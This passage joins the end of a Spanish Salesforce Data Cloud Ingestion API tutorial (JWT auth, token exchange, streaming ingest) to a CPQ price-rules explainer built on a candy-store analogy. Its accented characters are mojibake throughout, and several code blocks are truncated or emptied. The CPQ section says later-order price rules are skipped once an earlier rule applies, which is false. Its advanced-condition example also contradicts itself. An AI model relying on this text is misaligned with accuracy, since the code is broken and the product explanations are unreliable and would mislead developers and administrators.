O puede crearlo program谩ticamente usando el lenguaje de programaci贸n de su elecci贸n. M谩s adelante en este art铆culo, compartir茅 un pr谩ctico script de Node.js para generar el token de acceso a la nube de datos.

Antes de que podamos autenticarnos usando el JWT que generamos, debemos aprobar este consumidor. Puede hacerlo abriendo la siguiente URL en su navegador.

<dx-code-block title language code-block="https://login.salesforce.com/services/oauth2/authorize?response_type=token&client_id=&redirect_uri=”>

Y luego, inicie sesi贸n y permita el acceso:

Ahora que hemos aprobado nuestro JWT, necesitamos autenticarnos. Este es un proceso de dos pasos. Primero, necesitamos obtener un token de acceso usando el JWT. Para hacer esto, realicemos una solicitud POST HTTP con la siguiente informaci贸n.

<dx-code-block title language code-block="POST https://login.salesforce.com/services/oauth2/token
Content-Type : x-www-form-urlencoded
grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer
&assertion=”>

Nota: aseg煤rese de reemplazar <JWT> con el token que creamos anteriormente.

Esta solicitud nos dar谩 un token de acceso central y la URL de la instancia de Data Cloud, utilizando nuestra aplicaci贸n conectada. Como se muestra en el alcance , se nos otorgan los alcances cdp_ingest_api y api .

A continuaci贸n, debemos cambiar el token de acceso principal por un token de nube de datos. Para hacer eso, realicemos la siguiente solicitud POST.

<dx-code-block title language code-block="POST /services/a360/token Content-Type : x-www-form-urlencoded grant_type=urn:salesforce:grant-type:external:cdp &subject_token= &subject_token_type=urn:ietf:params:oauth:token-type:access_token”>

Ahora, estamos autenticados. El token de acceso a la nube de datos resultante es lo que usaremos para realizar solicitudes a la API de ingesta.

Para simplificar el proceso, he creado un script Node.js. Crea el JWT y realiza la autenticaci贸n en dos pasos. Para usarlo, necesitar谩 la clave privada que cre贸 anteriormente, as铆 como un archivo de configuraci贸n similar al siguiente.

config.js

Adem谩s, instale la dependencia jsonwebtoken desde npm ejecutando:

credenciales.js

console.log(auth)) .catch((err) => console.error(err)); “>

El m茅todo generateAccessToken devolver谩 el objeto de autenticaci贸n de Data Cloud, incluido el access_token y la instance_url necesarios para comenzar a ingerir datos en Data Cloud.

Ingesta de datos

Tenemos toda la informaci贸n necesaria para comenzar a ingerir datos en la nube de datos. Esto se puede lograr utilizando los patrones Streaming o Bulk.

Transmisi贸n

Para comenzar a transmitir datos en el conector de Ingesti贸n de nube de datos, primero obtenga el nombre del conector y el nombre del objeto de la configuraci贸n del conector de la API de Ingesti贸n. Para hacer esto, puede realizar una solicitud POST como la siguiente.

<dx-code-block title language code-block="POST https:///api/v1/ingest/sources/Solar_Panel_Events/solar_panel_event
Authorization: Bearer
Content-Type: application/json
{ "data": [ {"event_id": "f47ac10b-58cc-4372-a567-0e02b2c3d479","customer_id": "003R00000123456789","battery": 75.2,"dc_current": 9.8,"dc_voltage": 35.6,"mpp_energy": 120.5,"ac_voltage": 220.1,"ac_current": 5.3,"date_time": "2023-07-07T10:15:30.05Z"} ] }”>

Nota : aseg煤rese de reemplazar <token de acceso a la nube de datos> y <url de instancia> con los valores respectivos que obtuvo del proceso de autenticaci贸n.

Si todo va bien, recibir谩s la siguiente respuesta:

Esto indica que nuestros datos han sido aceptados con 茅xito.

Nota : tambi茅n puede validar los datos con el esquema antes de enviarlos agregando /actions/test al punto final de la API.

A granel

La ingesti贸n masiva implica varios pasos, lo que agrega un nivel de complejidad al proceso:

  • Crear un trabajo: este paso implica crear un trabajo para especificar el tipo de objeto de los datos que se procesan y la operaci贸n que se realizar谩, que puede ser upsert o delete.
  • Cargar los datos en CSV: Despu茅s de crear el trabajo, el siguiente paso es cargar los datos en formato CSV. El archivo CSV debe contener los datos que se procesar谩n, con cada fila representando un registro y las columnas que contienen los valores de campo.
  • Indicar la preparaci贸n de los datos: una vez que se cargan los datos, deber谩 indicar que los datos est谩n listos para ser procesados.
  • Cerrar o cancelar el trabajo: despu茅s de procesar los datos, puede cerrar el trabajo para marcarlo como completado o cancelar el trabajo si es necesario.

Para obtener m谩s informaci贸n sobre c贸mo usar los puntos de conexi贸n masivos, puede consultar la documentaci贸n oficial .

Puede consultar los datos entrantes utilizando el Explorador de datos en Data Cloud. All铆, seleccionar谩 el objeto Data Lake correspondiente al conector de ingesta que cre贸 anteriormente.

Si desea probarlo usted mismo, siempre puede utilizar nuestra colecci贸n Postman de desarrolladores de Salesforce, que incluye las API de Salesforce Data Cloud .

Conclusi贸n

Ahora, est谩 listo para comenzar a cargar datos mediante programaci贸n en Data Cloud mediante la API de ingesta. Siguiendo los pasos anteriores, puede conectarse sin problemas a varias fuentes de datos e importar datos en tiempo real o en masa, y comenzar a aprovechar el poder y la magia de Salesforce Data Cloud.

Adem谩s, si prefiere aprender de un video, mi colega Aditya ha creado un video 煤til que explica lo que hemos cubierto en esta publicaci贸n de blog . Aseg煤rese de ver tambi茅n los otros excelentes videos de la serie Data Cloud Decoded .

Recursos

Sobre los autores

Juli谩n Duque es un defensor principal de desarrolladores en Salesforce, donde se enfoca en Node.js, JavaScript y desarrollo backend. Le apasiona la educaci贸n y el intercambio de conocimientos y ha estado involucrado en la organizaci贸n de comunidades tecnol贸gicas y de desarrolladores desde 2001.

S铆galo @julianduque en Threads, @julian_duque en Twitter, @julianduque.co en Bluesky social o LinkedIn .

Aditya Naag Topalli es una defensora de desarrolladores l铆der certificada 14 veces en Salesforce. Capacita e inspira a los desarrolladores dentro y fuera del ecosistema de Salesforce a trav茅s de sus videos, seminarios web, publicaciones de blog y contribuciones de c贸digo abierto, y tambi茅n habla con frecuencia en conferencias y eventos en todo el mundo. S铆galo en Twitter o LinkedIn y vea sus contribuciones en GitHub .

Obtenga las 煤ltimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a trav茅s de Slack o RSS.

Agregar a Slack Suscr铆bete a RSS

Continue reading

Salesforce CPQ cubierto de az煤car: 隆Desentra帽ando las reglas de precios en el mundo de las tiendas de golosinas!

Salesforce CPQ cubierto de az煤car: 隆Desentra帽ando las reglas de precios en el mundo de las tiendas de golosinas!

Imagine que est谩 creando un sistema Salesforce CPQ para una tienda de golosinas. Vaya, ser谩 muy divertido. 驴C贸mo usar铆a las reglas de precios para manejar promociones especiales, como una oferta de "Compre uno, ll茅vese otro gratis" para un dulce espec铆fico? En el escenario de la tienda de golosinas, 驴c贸mo crear铆a una regla de precio para aplicar un descuento del 20 % a todos los chocolates durante el D铆a de San Valent铆n?

Entonces, 隆saltemos y exploremos las reglas de precios en el universo de Salesforce CPQ cubierto de az煤car! Yay 馃槉

驴Regla de precios en Salesforce CPQ?

Imagina que tienes una tienda de dulces con diferentes tipos de dulces como piruletas, ositos de goma y barras de chocolate. Cada caramelo tiene un precio diferente. Ahora, hablemos de la regla del precio:

La regla del precio es como una regla especial que creas para tu tienda de golosinas. Te ayuda a decidir c贸mo fijar los precios o aplicar descuentos a diferentes dulces en funci贸n de determinadas condiciones.

Por ejemplo, supongamos que desea tener una oferta de "Compre uno, ll茅vese otro gratis" para dulces de ositos de goma. Puede crear una regla de precios que diga que cada vez que alguien compra un paquete de ositos de goma, obtiene otro paquete gratis. 隆Es como una oferta especial solo para los amantes de los ositos de goma!

O tal vez quieras tener un descuento en piruletas por tiempo limitado. Puede crear una regla de precio llamada "Venta de piruletas" que reduce el precio de las piruletas en un 20 % durante una semana. Esto hace que las piruletas sean m谩s asequibles y anima a m谩s personas a comprarlas.

La regla de precios le permite establecer diferentes acciones y condiciones de precios para cada tipo de dulce. Puede definir descuentos, ofertas especiales o incluso ajustar los precios en funci贸n de condiciones espec铆ficas, como la cantidad comprada o el estado de membres铆a del cliente.

Al crear Reglas de precios, puede hacer que su tienda de golosinas sea m谩s emocionante y atraer a m谩s clientes. Te ayuda a establecer precios y aplicar descuentos de una manera que hace felices a las personas y las alienta a comprar sus dulces favoritos.

Imagen

驴Cu谩l es la estructura de la Regla de Precios?

La regla de precios inclu铆a tres registros relacionados:

  1. Regla de precio
  2. Precio Condici贸n
  3. Acci贸n del precio

La Regla de precio tiene una relaci贸n Maestro-Detalle con la Condici贸n de precio y la Acci贸n de precio.

Al conectar la regla de precios con las condiciones de precios secundarias relevantes, el sistema de precios garantiza que se apliquen las reglas apropiadas en funci贸n de condiciones espec铆ficas. Price Action define las acciones que se deben tomar cuando se cumplen las condiciones de precio asociadas. Especifica c贸mo se deben modificar los precios u otros valores de campo en funci贸n de los criterios de la regla.

1. Regla de precio: La regla de precio contiene todas las reglas espec铆ficas para la fijaci贸n de precios en la tienda de golosinas. Le dice a la tienda c贸mo manejar diferentes situaciones al establecer los precios de los dulces.

2. Condici贸n de precio: Hay alguien en la tienda que verifica el tipo de dulces que desea comprar. Se aseguran de que cumpla ciertas condiciones, como ser un 鈥淕ummy Bear鈥 o tener un sabor espec铆fico.

3. Acci贸n del precio: una vez que el dulce pasa la inspecci贸n, hay alguien que ajusta el precio seg煤n las reglas de precios. Pueden ofrecer un descuento, cambiar la cantidad o hacer algo especial para que el precio sea m谩s atractivo.

Importancia de los campos en la regla de precios

Los campos juegan un papel importante en las reglas de precios dentro de Salesforce CPQ. Las reglas de precios usan campos para definir condiciones, acciones y criterios que determinan c贸mo se aplican los c谩lculos de precios y los descuentos. Por lo tanto, comprenderemos cada campo en el objeto Regla de precio y su importancia con la ayuda del Ejemplo de tienda de golosinas.

Una captura de pantalla de una computadora Descripci贸n generada autom谩ticamente

驴Diferencia entre Calculator y Configurator Evaluation Scope en la regla de precio en Salesforce CPQ?

Un rect谩ngulo blanco y azul con una l铆nea azul Descripci贸n generada autom谩ticamente

El campo Alcance de la evaluaci贸n es como usar esa calculadora m谩gica. Cuando tiene reglas de precios con el 脕mbito de evaluaci贸n de la calculadora, la calculadora las utiliza para decidir cu谩nto deber铆a costar algo. Tiene dos valores de lista de selecci贸n:

  • 脕mbito de evaluaci贸n de la calculadora: el 谩mbito se trata de usar reglas especiales para calcular precios.
  • 脕mbito de evaluaci贸n del configurador: seguir las reglas cuando elige diferentes opciones.

Expliquemos la diferencia entre los 谩mbitos de evaluaci贸n de Calculadora y Configurador en Salesforce CPQ con un ejemplo en tiempo real:

Imagina que vas a una tienda de dulces a comprar unos deliciosos dulces. Tienes un presupuesto de $10 y quieres comprar diferentes tipos de dulces seg煤n sus sabores.

Exploremos c贸mo entran en juego los 谩mbitos de evaluaci贸n de la calculadora y el configurador:

1. 脕mbito de evaluaci贸n de la calculadora:

鈥 Imagina que hay una oferta especial en la que si compras m谩s de 5 caramelos, obtienes un 20% de descuento sobre el precio total.

鈥 Esta oferta es un ejemplo de una regla de precio con el 脕mbito de evaluaci贸n de la calculadora. La regla calcula el precio con descuento en funci贸n de la cantidad de dulces que est谩 comprando.

鈥 Entonces, si agrega 7 dulces a su carrito, la Calculadora eval煤a la regla del precio y aplica el descuento, reduciendo el costo total.

2. Alcance de la evaluaci贸n del configurador:

鈥 Ahora, consideremos los sabores de dulces disponibles en la tienda: fresa, chocolate y lim贸n.

鈥 Existe una regla que dice que si elige dulces con sabor a fresa, no puede elegir dulces con sabor a lim贸n porque no combinan bien.

鈥 Esta regla es un ejemplo de una regla de precio con el alcance de evaluaci贸n del configurador. Controla la disponibilidad de ciertas opciones en funci贸n de sus elecciones anteriores.

鈥 Si ya tienes caramelos de fresa en tu carrito, el Configurador eval煤a la regla y evita que selecciones caramelos de lim贸n, asegurando que no termines con una combinaci贸n incompatible.

En este ejemplo anterior

El 脕mbito de evaluaci贸n de la calculadora ayuda a calcular el precio total de sus dulces en funci贸n de ofertas especiales, descuentos y cantidad.

El 脕mbito de evaluaci贸n del configurador garantiza que siga ciertas reglas al seleccionar diferentes opciones, como sabores, para evitar opciones incompatibles.

驴Explicar el evento de evaluaci贸n de la calculadora?

Una captura de pantalla de una computadora Descripci贸n generada autom谩ticamente

Expliquemos los eventos de evaluaci贸n de la calculadora de "Al iniciar", "Al calcular", "Antes de calcular" y "Despu茅s de calcular" con un ejemplo en tiempo real utilizando el escenario de la tienda de golosinas:

En breve:

鈥淥n Initiate鈥 marca el comienzo del proceso de c谩lculo de caramelos.

鈥淥n Calculate鈥 realiza el c谩lculo del precio real de los dulces.

"Antes de calcular" aplica cualquier verificaci贸n o regla final justo antes del c谩lculo.

"Despu茅s de calcular" permite acciones adicionales o sorpresas despu茅s de que se hayan determinado los precios.

Entendamos con m谩s detalle:

1. Al iniciar:

鈥 Suponga que tiene una regla de precio que establece que si el cliente es un miembro leal, obtiene un 5 % de descuento en todas las compras de golosinas.

鈥 Esta regla de precio tendr铆a el evento de evaluaci贸n establecido en "Al iniciar".

鈥 Cuando el cliente inicia el proceso de c谩lculo del precio, como por ejemplo al comenzar una nueva cotizaci贸n, el sistema verifica si es un miembro fiel y aplica el 5% de descuento a todos los dulces en su carrito desde el principio.

2. En Calcular:

鈥 Imagine que tiene una regla de precio que ofrece un descuento por volumen si el cliente compra m谩s de 10 dulces de cualquier sabor.

鈥 Esta regla de precio tendr铆a el evento de evaluaci贸n establecido en "Al calcular".

鈥 A medida que el cliente agrega dulces a su carrito, el sistema calcula continuamente la cantidad total de dulces. Cuando alcanza o supera los 10, se activa la regla de precio y se aplica un descuento por volumen a todos los dulces del carrito.

3. Antes de calcular:

鈥 Supongamos que tiene una regla de precio que establece que si el cliente ha seleccionado dulces con un precio total superior a $30, recibe una bolsa de dulces de cortes铆a.

鈥 Esta regla de precio tendr铆a el evento de evaluaci贸n establecido en "Antes de calcular".

鈥 Justo antes de realizar el c谩lculo final, el sistema verifica si el precio total de los dulces supera los $30. Si es as铆, se activa la regla de precio y se agrega una bolsa de dulces de cortes铆a al carrito.

4. Despu茅s de calcular:

鈥 Suponga que tiene una regla de precio que ofrece una oferta promocional especial de "Compre 2, obtenga 1 gratis" para un sabor de dulce espec铆fico.

鈥 Esta regla de precio tendr铆a el evento de evaluaci贸n establecido en "Despu茅s de calcular".

鈥 Una vez que se completa el c谩lculo final, el sistema revisa los dulces seleccionados por el cliente e identifica si califican para la oferta "Compre 2, obtenga 1 gratis". Si lo hacen, se activa la regla de precio y el sistema agrega los dulces gratis al carrito.

Mediante el uso de estos diferentes eventos de evaluaci贸n de la calculadora, puede aplicar descuentos, ofertas o modificaciones espec铆ficas en diferentes etapas del proceso de c谩lculo en Salesforce CPQ.

驴Cu谩l es el significado del campo "Condici贸n cumplida" en una regla de precios?

Una captura de pantalla de una computadora Descripci贸n generada autom谩ticamente

Expliquemos los conceptos de "Condici贸n cumplida – Todas" y "Condici贸n cumplida – Cualquiera" usando nuestro ejemplo de tienda de golosinas:

1. Condici贸n cumplida 鈥 Todas:

鈥 Imagina que tienes una tienda de golosinas con una promoci贸n especial: si un cliente compra al menos 5 golosinas y el precio total supera los $10, recibe una bolsa de golosinas gratis.

鈥 Esta regla de precio tendr铆a la condici贸n cumplida establecida en 鈥淭odos鈥.

鈥 Cuando un cliente agrega 5 o m谩s dulces a su carrito y el precio total de esos dulces supera los $10, 隆se cumplen todas las condiciones!

鈥 Como resultado, el sistema reconoce que el cliente califica para la promoci贸n y se agrega autom谩ticamente una bolsa de dulces gratis a su pedido al finalizar la compra.

2. Condici贸n cumplida 鈥 Cualquiera:

鈥 Ahora, considere una regla de precio diferente: si un cliente compra cualquier dulce con un sabor espec铆fico (por ejemplo, 鈥淐ereza鈥), o si compra m谩s de 10 dulces en total, recibe un descuento del 20%.

鈥 Esta regla de precio tendr铆a la condici贸n cumplida establecida en "Cualquiera".

鈥 Cuando un cliente selecciona un dulce con sabor a 鈥淐ereza鈥 o agrega m谩s de 10 dulces a su carrito, 隆cualquiera de las condiciones se cumple!

鈥 Como resultado, el sistema aplica el 20% de descuento a los dulces que califican, independientemente de la condici贸n que activ贸 el descuento.

En ambos escenarios, la "Condici贸n cumplida: todas" requiere que se cumplan todas las condiciones especificadas, mientras que la "Condici贸n cumplida: cualquiera" solo requiere que se cumpla al menos una condici贸n. Estos diferentes enfoques le permiten crear estrategias de precios personalizadas basadas en combinaciones espec铆ficas o criterios individuales.

驴Puede explicar el campo de objeto de b煤squeda en una regla de precio con la ayuda del escenario?

Un rect谩ngulo negro con borde azul Descripci贸n generada autom谩ticamente

En tu tienda de golosinas tienes diferentes tipos de golosinas con caracter铆sticas 煤nicas. El campo Objeto de b煤squeda en el objeto Regla de precio es como una conexi贸n especial que lo ayuda a aplicar reglas espec铆ficas a ciertos tipos de dulces.

Imagina que tienes un caramelo llamado "Rainbow Lollipop" y quieres crear una regla de precio especial para 茅l. As铆 es como funciona:

1. Relaci贸n de objetos de b煤squeda:

鈥 El campo Objeto de b煤squeda es como un puente que conecta la regla de precio con el caramelo 鈥淩ainbow Lollipop鈥.

鈥 Te ayuda a establecer una relaci贸n especial entre la Regla de Precio y este tipo de dulce espec铆fico.

2. Acceder a la informaci贸n de dulces:

鈥 Una vez que se establece la relaci贸n de b煤squeda, puede acceder a la informaci贸n sobre el caramelo 鈥淩ainbow Lollipop鈥 dentro de la regla de precio.

鈥 Podr谩s conocer detalles sobre el dulce, como su sabor, color

3. Aplicaci贸n de reglas especiales:

鈥 Al usar el campo Objeto de b煤squeda, puede crear reglas especiales que solo se aplican al caramelo 鈥淩ainbow Lollipop鈥.

鈥 Por ejemplo, puede crear una regla que ofrezca un descuento del 20% por cada 鈥淩ainbow Lollipop鈥 comprado.

Al tener esta conexi贸n especial entre la Regla de precio y el caramelo 鈥淩ainbow Lollipop鈥 a trav茅s del campo Objeto de b煤squeda, puede crear reglas 煤nicas y personalizadas solo para ese tipo de caramelo. Te permite aplicar ofertas especiales, descuentos u otras acciones espec铆ficas al 鈥淩ainbow Lollipop鈥 que lo hacen destacar entre otros dulces en tu tienda.

Vamos a entender con m谩s profundidad:

El campo Objeto de b煤squeda en el objeto Regla de precios es una funci贸n que le permite establecer una relaci贸n entre la Regla de precios y otro objeto en su organizaci贸n de Salesforce.

1. Establecimiento de la relaci贸n de b煤squeda:

鈥 Al crear una regla de precios, puede seleccionar un objeto relacionado en el campo Objeto de b煤squeda.

鈥 Esto establece una relaci贸n de b煤squeda entre la regla de precio y el objeto elegido.

鈥 El objeto relacionado puede ser un objeto de Salesforce est谩ndar (como Producto o Cuenta) o un objeto personalizado espec铆fico para sus necesidades comerciales.

2. Acceso a datos relacionados:

鈥 Una vez que se establece la relaci贸n de b煤squeda, puede acceder a los datos relacionados del objeto elegido dentro de la regla de precio.

鈥 Esto significa que puede recuperar informaci贸n de campos espec铆ficos en el objeto relacionado y usarla en su l贸gica de reglas de precios.

鈥 Por ejemplo, si el objeto de b煤squeda se establece en "Producto", puede acceder a los campos del objeto Producto, como Nombre del producto, Precio o cualquier campo personalizado relacionado con el producto.

3. Utilizaci贸n del objeto de b煤squeda en la l贸gica de la regla de precios:

鈥 Con el campo Objeto de b煤squeda, puede aprovechar los datos relacionados del objeto elegido para impulsar las condiciones y acciones de la regla de precios.

鈥 Por ejemplo, puede crear una regla de precio que aplique un descuento basado en el valor de un campo en el objeto relacionado.

鈥 Al hacer referencia a los campos en el objeto relacionado, puede definir condiciones y acciones que son din谩micas y adaptables en funci贸n de los valores almacenados en el objeto relacionado.

En resumen, el campo Objeto de b煤squeda en la Regla de precios le permite establecer una relaci贸n con otro objeto, recuperar datos de ese objeto y usarlos en la l贸gica de su regla de precios.

Si no ponemos ning煤n nombre de objeto en el campo de objeto de b煤squeda, 驴significa que no obtendr谩 datos de ese objeto y no podemos establecer una condici贸n basada en un registro en particular?

Eso es correcto. Si no especifica un nombre de objeto en el campo Objeto de b煤squeda de la Regla de precio, significa que la regla de precio no obtendr谩 datos de ning煤n objeto espec铆fico . Sin un objeto de b煤squeda especificado, no podr谩 establecer condiciones ni realizar acciones basadas en un registro particular o datos de otro objeto.

El campo Objeto de b煤squeda es fundamental para establecer una relaci贸n entre la regla de precios y un objeto espec铆fico. Le permite acceder y aprovechar los datos de ese objeto en la l贸gica de su regla de precios. Si deja el campo Objeto de b煤squeda en blanco, la regla de precio no tendr谩 una conexi贸n con ning煤n objeto, lo que limitar谩 su capacidad para hacer referencia a datos de otros registros o aplicar condiciones basadas en valores espec铆ficos .

驴Cu谩l es el significado de la casilla de verificaci贸n Activa en la regla de precios?

Una captura de pantalla de una computadora Descripci贸n generada autom谩ticamente

Cuando la casilla de verificaci贸n "Activo" est谩 marcada, indica que la regla de precios est谩 activa y solo entonces se evaluar谩 durante el proceso de c谩lculo de precios. Las reglas de precio inactivas no se eval煤an y sus condiciones y acciones se ignoran.

驴C贸mo afecta el campo Orden de evaluaci贸n a la aplicaci贸n de las Reglas de precios?

Un rect谩ngulo blanco con l铆neas negras Descripci贸n generada autom谩ticamente

El 鈥淥rden de Evaluaci贸n鈥 en una Regla de Precios es fundamental para definir la secuencia en la que se eval煤an las reglas durante el proceso de c谩lculo de precios. Ayuda a establecer la prioridad y la jerarqu铆a de las reglas cuando se aplican varias reglas. Las reglas con valores de orden de evaluaci贸n m谩s bajos se eval煤an primero.

Ejemplo de Orden de Evaluaci贸n:

Regla 1: Descuento para barras de chocolate

Orden de evaluaci贸n: 1

Condici贸n: Tipo de Caramelo es igual a 鈥淏arra de Chocolate鈥

Acci贸n: Aplicar un 10% de descuento sobre el precio de la barra de chocolate.

Regla 2: compre uno, ll茅vese otro gratis

Orden de evaluaci贸n: 2

Condici贸n: la cantidad es mayor o igual a 2

Acci贸n: Proporcionar un dulce gratis por cada dos dulces comprados.

En este ejemplo, la regla 1 tiene un orden de evaluaci贸n de 1, mientras que la regla 2 tiene un orden de evaluaci贸n de 2.

La regla 1 se evaluar谩 primero, seguida de la regla 2.

Ahora, veamos c贸mo la Orden de Evaluaci贸n impacta el c谩lculo de precios:

Supongamos que un cliente agrega dos barras de chocolate a su carrito. La Orden de Evaluaci贸n dicta la secuencia de ejecuci贸n de la regla. La regla 1, con un Orden de Evaluaci贸n inferior a 1, se evaluar谩 primero.

Regla 1 (Orden de evaluaci贸n 1):

Dado que el tipo de caramelo es una 鈥淏arra de Chocolate鈥 (condici贸n cumplida), se aplica un descuento del 10% sobre el precio de cada barra de chocolate.

Regla 2 (Orden de Evaluaci贸n 2):

La cantidad es 2 (condici贸n cumplida), pero la regla 2 no se evaluar谩 porque la regla 1 ya se aplic贸.

Como resultado, el cliente recibe un 10% de descuento en cada barra de chocolate y no hay cambios debido a la Regla 2.

Nota: La regla 1 se eval煤a primero y la regla 2 se omite porque la regla 1 ya se ha aplicado. S贸lo se aplicar谩 la primera regla. Esto se debe a que el Orden de evaluaci贸n determina la secuencia en la que se eval煤an las reglas y, una vez que se aplica una regla, se omiten las reglas posteriores con valores de Orden de evaluaci贸n m谩s altos.

驴Qu茅 sucede si queremos que se apliquen las reglas de precios y que no se omita ninguna seg煤n el Orden de evaluaci贸n?

Si desea que se apliquen ambas reglas sin omitir ninguna de ellas, deber谩 asegurarse de que ambas reglas tengan el mismo valor de Orden de evaluaci贸n. Al asignar el mismo Orden de Evaluaci贸n a ambas reglas, indica que tienen la misma prioridad, y ambas ser谩n evaluadas y aplicadas si se cumplen sus respectivas condiciones.

Modifiquemos el ejemplo para ilustrar esto:

1. Regla 1: Descuento para barras de chocolate

鈥 Orden de Evaluaci贸n: 1

鈥 Condici贸n: Tipo de Caramelo es igual a 鈥淏arra de Chocolate鈥

鈥 Acci贸n: Aplicar un 10% de descuento sobre el precio de la tableta de chocolate.

2. Regla 2: compre uno, ll茅vese otro gratis

鈥 Orden de Evaluaci贸n: 1

鈥 Condici贸n: La cantidad es mayor o igual a 2

鈥 Acci贸n: Proporcionar un caramelo gratis por cada dos caramelos comprados.

Con esta modificaci贸n, ambas reglas tienen un Orden de Evaluaci贸n de 1, lo que indica que tienen la misma prioridad.

Supongamos que un cliente agrega dos barras de chocolate a su carrito: la regla 1 y la regla 2, ambas con el orden de evaluaci贸n 1, se evaluar谩n en el orden en que aparecen.

鈥 Regla 1 (Orden de Evaluaci贸n 1):

鈥 Dado que el tipo de caramelo es una 鈥淏arra de Chocolate鈥 (condici贸n cumplida), se aplica un 10% de descuento sobre el precio de cada barra de chocolate.

鈥 Regla 2 (Orden de Evaluaci贸n 1):

鈥 La cantidad es 2 (condici贸n cumplida), y como ambas reglas tienen el mismo Orden de Evaluaci贸n, tambi茅n se eval煤a la Regla 2.

鈥 Se ejecuta la acci贸n de la Regla 2, entregando un caramelo gratis por cada dos caramelos comprados.

En este escenario, dado que ambas reglas tienen el mismo Orden de Evaluaci贸n, se eval煤an en el orden en que aparecen y ambas reglas se aplican si se cumplen sus condiciones. El cliente recibe un 10% de descuento en cada barra de chocolate y recibe un dulce gratis debido a la Regla 2.

驴C贸mo puede definir condiciones complejas usando la funci贸n de Condici贸n avanzada en una regla de precio?

Una captura de pantalla de una computadora Descripci贸n generada autom谩ticamente

Expliquemos la Condici贸n Avanzada en una Regla de Precio usando un ejemplo de caramelo:

Escenario de regla:

鈥 Desea crear una regla de precio para los dulces que son del tipo 鈥淕ummy Bear鈥, tienen un sabor a 鈥淔resa鈥 o se encuentran dentro de un rango de precios de $1 a $5.

Creando la Condici贸n Avanzada:

鈥 Con la funci贸n Condici贸n avanzada, puede definir una condici贸n compleja que involucre m煤ltiples campos y valores de comparaci贸n.

鈥 En este caso, configurar铆a la Condici贸n de precio asociada con la regla de precio con los siguientes componentes:

鈥 Condici贸n 1: Tipo de Caramelo es igual a 鈥淥sito de Gominola鈥

鈥 Condici贸n 2: Sabor igual a 鈥淔resa鈥

鈥 Condici贸n 3: El precio est谩 entre $1 y $5

(Candy_Type__c = 'Gummy Bear' && Flavor__c = 'Fresa') || (Precio__c >= 1 && Precio__c <= 5)

Tal como es (1 Y 2) O 3, implementaremos esta l贸gica utilizando la condici贸n avanzada

驴Qu茅 es el campo Producto en la regla de precio?

Un rect谩ngulo blanco con l铆neas negras Descripci贸n generada autom谩ticamente

Expliquemos el campo 鈥淧roducto鈥 en una Regla de Precio usando un ejemplo de dulces de una manera simple y f谩cil de entender:

Imagina que tienes una tienda de dulces con una variedad de dulces, como piruletas, barras de chocolate y ositos de goma. Cada caramelo tiene su propio precio. Ahora, hablemos del campo 鈥淧roducto鈥 en una regla de precio:

1. Selecci贸n de un producto de caramelo:

鈥 El campo 鈥淧roducto鈥 en una regla de precio le permite elegir un dulce espec铆fico del inventario de su tienda.

鈥 Por ejemplo, puede seleccionar el caramelo 鈥淕ummy Bears鈥 como el producto de destino para la regla de precio.

2. Aplicar acciones de fijaci贸n de precios a los dulces seleccionados:

鈥 Una vez que haya seleccionado el caramelo "Gummy Bears" en el campo "Producto", puede definir las acciones de fijaci贸n de precios que se aplicar谩n espec铆ficamente a ese caramelo.

鈥 Las acciones de fijaci贸n de precios pueden incluir cosas como descuentos u ofertas especiales.

鈥 Por ejemplo, puede crear una regla de precio que proporcione un 10 % de descuento en el precio de los dulces 鈥淕ummy Bears鈥.

3. Creaci贸n de condiciones divertidas (opcional):

Tambi茅n puede establecer condiciones divertidas en funci贸n de las caracter铆sticas de los dulces seleccionados.

Por ejemplo, puede crear una condici贸n que aplique la regla del precio solo si el caramelo "Gummy Bears" es de color rojo.

Podemos agregar el producto en el campo de objeto de b煤squeda en lugar del campo de producto en Salesforce, 驴cu谩l es la diferencia?

隆Est谩s en lo correcto! Adem谩s de seleccionar el producto directamente en el campo "Producto" de una regla de precios, tambi茅n tiene la opci贸n de hacer referencia al producto a trav茅s de un campo de relaci贸n de b煤squeda utilizando un objeto de b煤squeda. Exploremos la diferencia entre los dos enfoques:

1. Campo de producto:

鈥 Cuando selecciona el producto directamente en el campo 鈥淧roducto鈥 de la Regla de precio, est谩 asociando la regla de precio directamente con un producto espec铆fico.

鈥 Este enfoque es 煤til cuando desea definir acciones o condiciones de fijaci贸n de precios que se aplican a un producto o grupo de productos en particular.

鈥 Es una forma sencilla de orientar productos espec铆ficos dentro de su cat谩logo y definir reglas exclusivamente para esos productos.

2. Objeto de b煤squeda:

鈥 Con un objeto de b煤squeda, puede establecer una relaci贸n entre la Regla de precio y otro objeto en Salesforce, como un objeto personalizado o un objeto est谩ndar como una Cuenta u Oportunidad.

鈥 Esto le permite hacer referencia al producto indirectamente a trav茅s del objeto relacionado.

鈥 Mediante el uso de una relaci贸n de b煤squeda, puede definir acciones o condiciones de fijaci贸n de precios en funci贸n de los datos tanto del objeto relacionado como del producto asociado.

鈥 Este enfoque proporciona m谩s flexibilidad en la creaci贸n de reglas que dependen de la informaci贸n de otros objetos adem谩s del propio producto.

La elecci贸n entre usar el campo directo "Producto" o un objeto de b煤squeda depende de su caso de uso y requisitos espec铆ficos. Si solo necesita segmentar y definir reglas para productos espec铆ficos, el uso del campo "Producto" suele ser suficiente. Sin embargo, si su l贸gica de precios involucra datos de objetos relacionados o requiere relaciones m谩s complejas, puede ser beneficioso utilizar un objeto de b煤squeda.

驴C贸mo se especifican los grupos de productos a los que se aplica la regla de precios?

Expliquemos la implementaci贸n de grupos de productos en Reglas de precios usando un ejemplo de dulces:

1. Definir grupos de productos:

-Cree un campo personalizado de "Grupo de productos" en el objeto del producto. Establecer el valor del campo con

  • Caramelos Gomosos
  • Caramelos De Chocolate

2. Asignar atributos del producto:

鈥 Establezca el campo "Grupo de productos" en el objeto del producto en "Caramelos de goma" para los productos de ositos de goma y gusanos de goma.

鈥 Establezca el campo "Grupo de productos" en el objeto de producto en "Caramelos de chocolate" para barras de chocolate y productos de frutos secos cubiertos de chocolate.

3. Cree o edite una regla de precios:

鈥 Cree una nueva regla de precios o edite una existente haciendo clic en el bot贸n "Nuevo" o seleccionando la regla de precios deseada.

4. Asociar con el Objeto Producto:

鈥 En el registro de Regla de precio, localice el campo de b煤squeda o el campo de producto que le permite asociar la Regla de precio con el objeto que contiene el campo 鈥淕rupo de productos鈥 (en este caso, el objeto Producto).

5. Definir condiciones:

鈥 Dentro de la Regla de Precio, defina las condiciones de precio que especifican los grupos de productos.

鈥 Elija el campo que representa el grupo de productos, como el campo 鈥淕rupo de productos鈥 en el objeto asociado (objeto Producto).

